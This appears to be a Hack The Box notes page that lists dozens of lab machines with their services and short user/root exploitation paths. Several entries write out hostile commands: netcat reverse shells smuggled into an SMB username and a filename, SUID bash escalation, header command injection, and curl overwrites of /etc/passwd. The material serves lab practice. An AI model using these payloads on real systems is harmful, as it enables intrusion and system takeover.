HACK THE BOX HISTORY

Hack The Box History is a list of machines that in which you can find a small summary of each one with the most relevant information of each one.

Use the browser’s integrated search engine (ctrl+F) to search by the fields you are interested in (PE: RCE, SQLi, Exploit, Mysql ,etc).


Paper

By : secnigma

Linux – 10.10.11.143 Easy

Linux paper 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 8 – Fedora

Active services:

PORTSERVICEVERSION
20SSHOpenSSH
80/443HTTP/SSLApache httpd 2.4.37
OpenSSL 1.1.1k
mod_fcgi 2.3.9

User Own:

System Own:


GoodGames

By : TheCyberGeek

Linux – 10.10.11.130 Easy

Debian 4.19.0-18-amd64 Debian 4.19.208-1 x86_64 GNU/Linux

Debian 11 – Bullseye

Active services:

PORTSERVICEVERSION
80HTTPApache httpd 2.4.51

User Own:

  • Login bypassing with SQL Injection (SQLi) and Database Enumeration.
  • Raw-MD5 Password hash.
  • Flask Dashboard v2.0.2 – Server Side Template Injection (SSTI – jinja2).

System Own:

  • Docker.
  • Port Discovery.
  • Leaked Information and password reused.
  • Shh internal connection.
  • Home user directory mounted in Docker.
  • User Pivoting.

SteamCloud

By : felamos

Linux – 10.10.11.133 Easy

Debian 4.19.0-18-amd64 Linux x86_64

Debian – Sid

Active services:

PORTSERVICEVERSION
22FTPOpenSSH 7.9p1
2379
2380
HTTPKubernetes etc clusters
8443SSL/HTTPSMinicube API
10249
10250
10256
HTTPGolang net/http server Go-IPFS json-rpc or InfluxDB API. Kubelet

User Own:

  • Kubernetes API enumeration – Pods enumeration – Kubeletctl (https://github.com/cyberark/kubeletctl) – Node with pod vulnerable to RCE – Remote Command Execution (RCE) in POD with kubeletctl – Access to a Docker Container.

System Own:


NodeBlog

By : ippsec

Linux – 10.10.11.139 Easy

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1 Ubuntu 0.3
5000HTTPNode.js

User Own:

System Own:

  • MongoDB active on port 27017.
  • Mongodump enumeration – User credentials
  • Sudoers user privilege – (ALL : ALL) ALL

Pandora

By : TheCyberGeek & dmw0ng

Linux – 10.10.11.136 Easy

Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
22/TCPSSHOpenSSH 8.2p1
80/TCPHTTPApache 2.4.41
161/UDPSNMPSNMPv1 server; net-snmp SNMPv3 server (public)

User Own:

  • SNMP Enumeration – Clear text credentials for user “Daniel

System Own:

  • Local Port Forwarding – Pandora Console v7.ONG.742_FIX_PERL2020 – Unauthenticated SQLi

Backdoor

By : hkabubaker17

Linux – 10.10.11.125 Easy

Ubuntu Linux 5.4.0-80-generic x86_64

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1 Ubuntu 0.3 (protocol 2.0)
80HTTPApache 2.4.41 – WordPress 5.8.1
1337WASTEGdbserver

User Own:

System Own:

  • Screen SUID – Screen session activated by root – synchronization with param -X.

Nunchucks

By : TheCyberGeek

Linux – 10.10.11.122 Easy

Linux 5.4.0-86-generic x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1 4ubuntu0.3 (protocol 2.0)
80HTTPNginx 1.18.0
443SSL/HTTPNginx 1.18.0

User Own:

System Own:


Secret

By : z9fr

Linux – 10.10.11.120 Easy

Linux 5.4.0-89-generic x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1 4ubuntu0.3 (protocol 2.0)
80HTTPNginx 1.18.0
3000HTTPNodejs

User Own:

  • DUMB API.
  • Json Web Token (JWT).
  • Directory Fuzzing.
  • Source Code analysis – Git Project.
  • Remote Command Execution (RCE) – Exec Function.

System Own:

  • Executable with SUID permission.
  • C programming.
  • Function prctl(PR_SET_DUMPABLE, 1) available – Abusing Core Dump – Killing BUS program.
  • Generate crash file in /var/crash.
  • Read crash file with apport-unpack to read privileged files.

Antique

By : MrR3boot

Linux – 10.10.11.107 Easy

Linux antique 5.13.0-051300-generic #202106272333 SMP Sun Jun 27 23:36:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
23/TCPtelnet?
161/UDPSNMPSNMP

User Own:

  • SNMP Enumeration – snmpwalk – Get hexadecimal code from BIT param.
  • Decoded Hexadecimal – Obtain a password – Access to telnet service – Exec function enabled.

System Own:


Validation

By : ippsec

Linux – 10.10.11.107 Easy

Linux validation 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 GNU/Linux

Debian GNU/Linux 11 – Bullseye

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80HTTPApache httpd 2.4.48
4566HTTPnginx
8080HTTPnginx

User Own:

System Own:

  • PHP File with root credentials.

Horizontall

By : wail99

Linux – 10.10.11.105 Easy

Linux horizontall 4.15.0-154-generic #161-Ubuntu SMP Fri Jul 30 13:04:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.5 LTS – Bionic

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.6p1
80HTTPnginx 1.14.0

User Own:

  • Virtual hosting.
  • Directory Fuzzing – Find subdomain with an API.
  • Strapi 3.0.0-beta.17.4 (Open source Node.js CMS) – Remote Command Execution (RCE) – (https://www.exploit-db.com/exploits/50239) – Access as “strapi” user.

System Own:


Spectra

By : egre55

Others – 10.10.10.229 Easy

Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7302P 16-Core Processor AuthenticAMD GNU/Linux

ChromeOS

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.1
80HTTPnginx 1.17.4
3306MYSQLMySQL

User Own:

  • Virtual Hosting.
  • WordPress 5.4.2 / PHP 5.6.40.
  • WordPress configurations files (wp.config)- Directory Listing – Access to wordpress administrator – Remote Command Execution (RCE) into a php template file – Access as “nginx” user.
  • System enumeration – File with credentials into an etc folder – access as “katie” user.

System Own:

  • Sudoers user privilege – (ALL) SETENV: NOPASSWD: /sbin/initctl – modification a service configuration file to execute a commands as root.

Admirer

By : polarbearer & GibParadox

Linux – 10.10.10.187 Easy

Linux admirer 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux

Devuan GNU/Linux 2.1 – ascii

Active services:

PORTSERVICEVERSION
21FTPvsftpd 3.0.3
22SSHOpenSSH 7.4p1 (protocol 2.0)
80HTTPApache httpd 2.4.25

User Own:

  • Robots.txt disallowed directory – File Fuzzing – Find a credentials file – Access to ftp server – File server configuration.
  • Adminer Database 4.6.2 – Creating an own database to exploit vulnerability -(https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool) – Local File Inclusion (LFI) using “LOAD DATA LOCAL” – Obtain user “waldo” credentials to ssh connect – Access as user “waldo“.

System Own:

  • Sudoers user privilege – (ALL) SETENV: /opt/scripts/admin_tasks.sh – Set enviroment variables capacity.
  • Python Library Hijacking – shutil.py.
  • Modify user python path and execute the script – sudo PYTHONPATH=/tmp /opt/scripts/admin_tasks.sh

Traceback

By : Xh4H

Linux – 10.10.10.181 Easy

Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.6p1 (protocol 2.0)
80HTTPApache httpd 2.4.29

User Own:

  • Page source analysis – PHP Shell backdoor – Remote Command Execution (RCE) – (https://github.com/TheBinitGhimire/Web-Shells) – Access as “webadmin” user.
  • Sudoers user privilege – (sysadmin) NOPASSWD: /home/sysadmin/luvit – User “webadmin” can run a Lua binary as user “sysadmin” – Executing os.execute(‘/bin/bash’) into Lua interface – Pivoting – Access as “sysadmin” user.

System Own:

  • File MOTD into etc folder which owner is “root” and group owner is “sysdamin” – This MOTD has an header file that execute an “echo” when an user access by SSH – Add an authorized-key to .ssh “sysadmin” user path – Modification of the header file to introduce a Rever shell – Access as “root” user.

OpenAdmin

By : del_KZx497Ju

Linux – 10.10.10.171 Easy

Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.6p1 (protocol 2.0)
80HTTPApache httpd 2.4.29

User Own:

  • Directory fuzzing.
  • OpenNetAdmin – v18.1.1 – Remote Command Execution (RCE) – (https://github.com/amriunix/ona-rce) – Access as “www-data” user.
  • Mysql crendentials into a database config php file – password for “jimmy” user.
  • Site available on port 52846 – assignUserID to user “joanna” – Creating an evil php file to execute commands as “joanna” user – Getting an encrypted id_rsa of joanna – ssh2john – Access as “joanna” user.

System Own:


Traverxec

By : jkr

Linux – 10.10.10.165 Easy

Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

Debian GNU/Linux 10 – buster

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.9p1 (protocol 2.0)
80HTTPnostromo 1.9.6

User Own:

System Own:


Postman

By : TheCyberGeek

Linux – 10.10.10.160 Easy

Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.3 LTS – bionic

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.6p1 (protocol 2.0)
80HTTPApache httpd 2.4.29
6379REDISRedis key-value store 4.0.9
10000HTTPMiniServ 1.910 (Webmin)

User Own:

System Own:


Networked

By : guly

Linux – 10.10.10.146 Easy

Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 7- rhel fedora

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.4 (protocol 2.0)
80HTTPApache httpd 2.4.6 / PHP 5.4.16

User Own:

  • Information leaked – Directory Fuzzing.
  • PHP code downloadable – Code analysis.
  • Image file upload capability.
  • Upload an evil php file into an image file – Remote Command Execution (RCE) – access as user “apache“.
  • PHP script executed by user “guly” periodically (/home/guly/) – Use of function exec() to execute rm command – Adding command into filename with: touch ‘; nc -c bash IP PORT’ – Access as user “guly“.

System Own:


Safe

By :gh0stm5n

Linux – 10.10.10.147 Easy

Linux safe 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12) x86_64 GNU/Linux

Debian Linux 9 – stretch

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.4p1 (protocol 2.0)
80HTTPApache httpd 2.4.25
1337UNKNOWNUNKNOWN

User Own:

  • Web enumeration – Information Leakage
  • Script running in port 1337 – 64-bit Executable binary downloadable – Reverse engineering – Code analysis – Buffer Overflow (BOF) [Remote]:
    • Use function system(“/usr/bin/uptime”)
    • NX Enabled.
    • ROP attack.

System Own:

  • Keepass password database in user home “MyPasswords.kdbx“.
  • JPG images in user home, posible keyfiles to keepass.
  • Keppass Brute Force – Keepass2john -k keyFileImage .kdbx. – Keepass Password.
  • Root password into keepaas database.

Haystack

By : JoyDragon

Linux – 10.10.10.115 Easy

Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

CentOS Linux 7 – rhel fedora

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.4 (protocol 2.0)
80HTTPnginx 1.12.2
9200HTTPElasticSearch 6.4.2

User Own:

System Own:

  • Logstash. Files Input.conf -> Filter.conf -> Output.conf on /etc/logstash/conf.d – Execute by “root” every 10 seconds a command locate in /opt/kibana/ with name logstash_*.

Writeup

By : jkr

Linux – 10.10.10.138 Easy

Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux

Devuan GNU/Linux 2.1 – ascii

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.4p1 (protocol 2.0)
80HTTPApache httpd 2.4.45

User Own:

System Own:

  • System process enumeration (PSPY) – (https://github.com/DominicBreuker/pspy)
  • Shell script executed by root into MOTD – Using “uname” from relative path – The script is executed as a welcome when a user successfully logs in via SSH.
  • User “jkr” in “staff” group – Can write to “/usr/local“.
  • Path Hijacking – cp an evil uname to /usr/local/bin.

SwagShop

By : ch4p

Linux – 10.10.10.140 Easy

Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 16.04.6 LTS – xenial

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.2p2 (protocol 2.0)
80HTTPApache httpd 2.4.18

User Own:

System Own:

  • User “www-data” in sudo group. Sudoers user privilege NOPASSWD: /usr/bin/vi /var/www/html/*
  • Create a variable Shell=/bin/bash into vi and executed it.

FriendZone

By : askar

Linux – 10.10.10.123 Easy

Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.1 LTS – bionic

Active services:

PORTSERVICEVERSION
21FTPvsftpd 3.0.3
22SSHOpenSSH 7.6p1 (protocol 2.0)
53DOMAINISC BIND 9.11.3
80HTTPApache httpd 2.4.29
139NETBIOS-SSNSamba smbd 3.X – 4.X
443SSL/HTTPApache httpd 2.4.29
445NETBIOS-SSNSamba smbd 4.7.6

User Own:

  • Virtual Hosting.
  • DNS zone transfer attack (AXFR). Subdomain Enumeration.
  • SMB Enumeration. Disk with READ,WRITE permissions into path /etc/Development.
  • Directory Path Traversal Into a PHP script – Remote Command Execution (RCE) – access as “www-data” user.
  • Credentials into a “.conf” file – access as “friend” user.

System Own:

  • System process enumeration.
  • Python script executed by root periodically (/opt/server_admin/reporter.py).
  • Python Library Hijacking – OS Library – Permissions 777 to /usr/lib/python2.7/os.py

Help

By : cymtrick

Linux – 10.10.10.153 Easy

Linux 4.4.0-116-generic #140-Ubuntu x86_64 GNU/Linux

Ubuntu 16.04.5 LTS – xenial

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.2p2 (protocol 2.0)
80HTTPApache httpd 2.4.18
3000HTTPNode.js Express framework

User Own:

System Own:


Teacher

By :Gioo

Linux – 10.10.10.153 Easy

Linux 4.9.0-8-amd64 Debian 4.9.110-3+deb9u6 x86_64 GNU/Linux

Debian GNU/Linux 9.5 – stretch

Active services:

PORTSERVICEVERSION
80HTTPApache httpd 2.4.25

User Own:

  • Virtual Hosting.
  • Source code analysis – HTML.
  • Information leaked inside alleged image.
  • Directory Fuzzing.
  • Moodle.
  • Brute force (password).
  • Mysql – MariaDB (10.1.26-MariaDB-0+deb9u1) – Database inspection – MD5 Pass.

System Own:

  • System enumeration.
  • Bash script executed by root periodically (/usr/bin/backup.sh)
  • Backup of user home folder with Chmod 777 -R.
  • Symbolic link from root directory.

Irked

By : MrAgent

Linux – 10.10.10.117 Easy

Linux 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

Debian 8.10 – jessie

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 6.7p1 (protocol 2.0)
80 HTTPApache httpd 2.4.10
111RPCBINDRPC
6697IRCUnrealIRCd
8067IRCUnrealIRCd
52182??
65534IRCUnrealIRCd

User Own:

System Own:

  • SUID script.

Curling

By : L4mpje

Linux – 10.10.10.150 Easy

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.6p1 4ubuntu0.5 (protocol 2.0)
80HTTPApache httpd 2.4.29 – Joomla

User Own:

  • Information Leaked.
  • Base64-encoded password.
  • Creating an evil PHP file into template – Remote Command Execution (RCE).
  • User Password file within TarFile within Bzip2 within p7zip within Gzip within bzip2 within Hexadecimal-encoded file.

System Own:

  • Modification of /etc/passwd with Curl with the use of the “output” parameter in script located in the user’s admin-area folder executed by the root user periodically. (Pivoting)

Frolic

By : Felamos

Linux – 10.10.10.111 Easy

Ubuntu 4.4.0-116-generic i686 athlon i686 GNU/Linux

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.2p2
139NETBIOS-SSNSamba smbd 3.X – 4.X
445NETBIOS-SSNSamba smbd 4.3.11-Ubuntu
1880Node-REDNode.js
9999HTTPnginx 1.10.3

User Own:

  • Source code leaks.
  • Ook! – Esoteric programming language.
  • Brute force in zip file.
  • Base64 and Hexadecimal decode.
  • BrainFuck – Esoteric programming language.
  • phpinfo() – Information Leakage.
  • PlaySMS 1.4 – Remote Code Execution (RCE) (CVE-2017-9101) – (https://www.exploit-db.com/exploits/42044).

System Own:

  • SUID binary.
  • Buffer Overflow:
    • NX Enabled
    • ASLR Disabled

Blocky

By : Arrexel

Linux – 10.10.10.37 Easy

Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 16.04.2 LTS – xenial

Active services:

PORTSERVICEVERSION
21FTPProFTP 1.3.5a
22SSHOpenSSH 7.2p2 (protocol 2.0)
80HTTPApache httpd 2.4.7
25565MINECRAFT SERVERMinecraft 1.11.2

User Own:

  • User enumeration in post author (notch).
  • Directory Fuzzing.
  • Credentials into a “.class” file within in a “.jar” file.
  • Reused credentials for the “notch” user via SSH.
  • [Alternative] Reused credentials for the phpMyAdmin “root” user and.
    • Change password user notch to access wordpress administration panel.
    • Remote Command Execution (RCE) into php template file – access as “www-data” user.

System Own:


Bank

By : makelarisjr

Linux – 10.10.10.29 Easy

Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux

Ubuntu 14.04.5 LTS – trusty

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 6.6.1p1
53DOMAINISC BIND 9.9.5
80HTTPApache httpd 2.4.7

User Own:

  • Virtual Hosting.
  • Directory Fuzzing.
  • Directory Listing.
  • Credentials into a”.acc” file extension.
  • Upload an evil php file (PHP 5.5.9) – Remote Command Execution (RCE). **[DEBUG] I added the file extension .htb to execute as php for debugging purposes only**.

System Own:

  • SUID File (/var/htb/emergency) allows you to run a shell as root user.
  • [Alternative] File /etc/passwd with write permission for other users.

Beep

By : ch4p

Linux – 10.10.10.7 Easy

Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 4.3 (protocol 2.0)
25SMTPPostfix smtpd
80HTTPApache httpd 2.2.3
110POP3Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111RPCBINDRPC
143IMAPCyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443SSL/HTTPApache httpd 2.2.3
878RPCRPC
993SSL/IMAPCyrus imapd
995POP3Cyrus pop3d
3306MYSQL?
4190SIEVECyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445HYLAFAXHylaFAX 4.3.10
5038ASTERISKAsterisk Call Manager 1.1
10000HTTPMiniServ 1.570 (Webmin httpd)

User Own:

*IMPORTANT * To access the web resources it is necessary to activate TLS 1.0 in Firefox https://support.mozilla.org/en-US/questions/1101896

  • Elastix – Local File Inclusion (LFI) (https://www.exploit-db.com/exploits/37637).
  • Credentials in plain text into /etc/amportal.conf.
  • VTiger GRM 5 – Upload an evil php file – Remote Command Execution (RCE) – System access as “asterisk” user.
  • [Alternative] Webmin – Shell shock attack – System access as “root” user.
  • [Alternative] Password reuse for SSH access as root user.

System Own:

  • [asterisk] – Sudoers multiple privileges as root user:
    • NOPASSWD: /sbin/shutdown
    • NOPASSWD: /usr/bin/nmap -> https://gtfobins.github.io/gtfobins/nmap/#sudo
    • NOPASSWD: /usr/bin/yum
    • NOPASSWD: /bin/touch
    • NOPASSWD: /bin/chmod -> sudo chmod u+s /bin/bash; bash -p
    • NOPASSWD: /bin/chown -> https://gtfobins.github.io/gtfobins/chown/#sudo
    • NOPASSWD: /sbin/service -> sudo service ../../../bin/bash
    • NOPASSWD: /sbin/init
    • NOPASSWD: /usr/sbin/postmap
    • NOPASSWD: /usr/sbin/postfix
    • NOPASSWD: /usr/sbin/saslpasswd2
    • NOPASSWD: /usr/sbin/hardware_detector
    • NOPASSWD: /sbin/chkconfig
    • NOPASSWD: /usr/sbin/elastix-helper

Lame

By : ch4p

Linux – 10.10.10. 3 Easy

Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Ubuntu 8.04 – hardy

Active services:

PORTSERVICEVERSION
21FTPvsftpd 2.3.4 (Anonymous FTP login allowed)
22SSHOpenSSH 4.7p1 (protocol 2.0)
139NETBIOS-SSNSamba smbd 3.0.20-Debian
445NETBIOS-SSNSamba smbd 3.0.20-Debian
3632DISTCCDdistccd v1

User Own / System Own:

  • Smbclient – protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED:
    • –option=”client min protocol=NT1″
  • Remote Command Execution (RCE):
    • Use username /=`nohup + command into SMB login:
-c 'logon "/=`nohup nc -e /bin/bash IP PORT`"'
smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1" -c 'logon "/='nohup nc -e /bin/bash IP PORT'"'

BackendTwo

By : ippsec

Linux – 10.10.11.162 Medium

Linux BackendTwo 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80HTTPuvicorn

User Own:

  • Directory Fuzzing.
  • Uvicorn API – JSON data – User Enumeration.
  • Json Web Token (JWT).
  • FastAPI 0.1.0 OAS3 Docs – Mass assignment attack (MAA).
  • Local File Read with API.
  • System process enumeration- Find uvicorn process PID.
  • Get JWT Secret token from api config files – Modifying user JWT.
  • Abusing API functions – Download API code files – Upload moficated .py files with a rever shell – Access as “htb” user.

System Own:

  • Find user htb password into aut.log.
  • PAM-Wordle configured – A mini game about guessing a word to get sudoers permissions – Pam files found into pam.d/sudo – List of words found into a file into binary strings – Find word “ipsec“.
  • Sudoers user privilege (ALL : ALL) ALL

Backend

By : ippsec

Linux – 10.10.11.161 Medium

Linux Backend 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80HTTPuvicorn

User Own:

  • Directory Fuzzing.
  • Uvicorn API – JSON data – User Enumeration.
  • Json Web Token (JWT).
  • FastAPI 0.1.0 OAS3 Docs – Modification user admin password with an API function.
  • Get JWT Secret Token from API configuration files – Modification JWT of user Admin to add field debug.
  • Executing Commands with API function – Rever Shell – Acces as “htb” user.

System Own:

  • Root password into auth.log.

Ransom

By : ippsec

Linux – 10.10.11.153 Medium

Linux ransom 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.4 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80HTTPApache 2.4.41

User Own:

System Own:

  • Hard-coded root password into the web login access php code.

Epsilon

By : MrR3boot

Linux – 10.10.11.134 Medium

Linux epsilon 5.4.0-97-generic #110-Ubuntu SMP Thu Jan 13 18:22:13 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80HTTPApache 2.4.41
5000HTTPWerkzeug httpd 2.0.2 (Python 3.8.10)

User Own:

  • Directory fuzzing.
  • /.git/ folder – Using GitHack to download the repository (https://github.com/OwenChia/githack).
  • Obtain AWS access keys from Git commit – Get a secret key from lamdba functions with aws tool.
  • Creating a JWT to “admin” user with the Secret found
  • Bypass login panel using the JWT as an auth session cookie.
  • Server Side Template Injection (SSTi – jinja2) – Remote Command Execution (RCE) – access as “tom” user.

System Own:

  • System enumeration with PSPY.
  • Cron – Bash script executed by root periodically – /usr/bin/backup.sh – Using TAR command with “-h” param to follow symlinks.
  • Create and evil script to steal user root id_rsa with a symlink.

Flustered

By : polarbearer

Linux – 10.10.11.131 Medium

Linux flustered 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux

Debian GNU/Linux 10 – buster

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.9p1
80HTTPnginx 1.14.2
111RPCBINDRPC 2-4
3128HTTP-PROXYSQUID http proxy 4.6
24007GLUSTERFSGluster File System
49152SSL?
49153RPCBINDRPC

User Own:

  • GlusterFS Enumeration – Mounting Volume1 into local file system – Mysql /var/lib files – MariaDB 10.3.31 – Getting squid proxy user&password.
  • Access to Squid Proxy using curl –proxy.
  • Directory Proxy Fuzzing.
  • Leaked app python code – Flask Server Side Template Injection (SSTi – jinja2) – Remote Command Execution (RCE) – Access as “www-data” user.
  • Obtaining clusterfs certs to mount Volume2 into local file system – Modification authorized key from ssh – Access as “jennifer” user into a docker container.

System Own

  • Port Discovery – Open port 10000 – SSH Local Port Forwarding – Microsoft Azure Storage – Get Azure Key from a backup – Connect to Azure Storage with a Local Storage Emulator – Get root id_rsa.

Timing

By: irogir

Linux – 10.10.11.135 Medium

Linux timing 4.15.0-147-generic #151-Ubuntu SMP Fri Jun 18 19:21:19 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 18.04.6 LTS – Bionic

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 7.6p1
80HTTPApache 2.4.29

User Own:

  • Fuzzing php files.
  • Local File Inclusion (LFI) – PHP wrappers Base64 (php://filter/convert.base64-encode/resource=file)- (https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#base64-1) – Downloading PHP web source code.
  • PHP code analysis.
  • Compute filename as a function of time.
  • Uploaded php code into a jpg image – Remote command Execution (RCE).
  • Getting a zip file with a git project from web server – Get db credentials from a commit.
  • Reusing password for access to SSH as “aaron” user.

System Own:

  • Sudoers user privilege – (ALL) NOPASSWD: /usr/bin/netutils – creating symbolics links to modify files with root privileges.

Union

By: ippsec

Linux – 10.10.11.128 Medium

Linux union 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
80HTTPnginx 1.18.0

User Own:

  • PHP files fuzzing.
  • SQL injection (SQLi) Error Based using UNION operator:
    • Enumerate Data Base to find a flag which enable ssh IP access.
    • Using load_file for read a php config file to get database credentials for “uhc” user.
  • Reusing password for access to SSH as “uhc” user.

System Own:

  • PHP file Firewall.php analysis.
  • Abusing header X-FORWARDER-FOR to executing commands as “www-data” user – Remote command execution (RCE).
  • Sudoers www-data privilege – (ALL : ALL) NOPASSWD: ALL
  • (X-FORWARDED-FOR: 1.1.1.1; sudo chmod u+s /bin/bash;)

Unicode

By: webspl01t3r

Linux – 10.10.11.126 – Medium

Linux code 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.3 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80HTTPnginx 1.18.0

User Own:

System Own:

  • Sudoers user privilege – (root) NOPASSWD: /usr/bin/treport
  • Decompile treport binary using pyinstxtractor (https://github.com/LucifielHack/pyinstxtractor) and pycdc (https://github.com/zrax/pycdc).
  • Abussing -o curl param to modify the passwd file – {IP/passwd,-o,/etc/passwd}
  • [Alternative] add your id_rsa.pub to root authorized_key – {IP/id_rsa.pub,-o,/root/.ssh/authorized_key}

Shibboleth

By: knightmare & mrb3n

Linux – 10.10.11.124 Medium

Linux shibboleth 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.1 LTS – Focal

Active services:

PORTSERVICEVERSION
80/TCPHTTPApache httpd 2.4.41
623/UDPIPMIIPMI 2.0

User Own:

  • Virtual Hosting.
  • Subdomain and directory fuzzing.
  • IPMI 2.0 – Cracking “Administrator” password (https://github.com/c0rnf13ld/ipmiPwner)
  • Zabbix 5.0.17 – Remote code execution (RCE) (Authenticated) – Creating a “system.run” key item to executing commands.
  • Password reuse to user “ipmi-svc“.

System Own:


Devzat

By: c1sc0

Linux – 10.10.11.118 Medium

Linux devzat 5.4.0-77-generic #86-Ubuntu SMP Thu Jun 17 02:35:03 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

Ubuntu 20.04.2 LTS – Focal

Active services:

PORTSERVICEVERSION
22SSHOpenSSH 8.2p1
80HTTPApache httpd 2.4.41
8000SSHCHAT over SSH (https://github.com/quackduck/devzat)

User Own:

  • Virtual Hosting.
  • Subdomain Fuzzing.
  • .git directory – Go code analysis – Remote Command Execution (RCE) modifying the json post data to inject system commands – Access as “patrick” user.
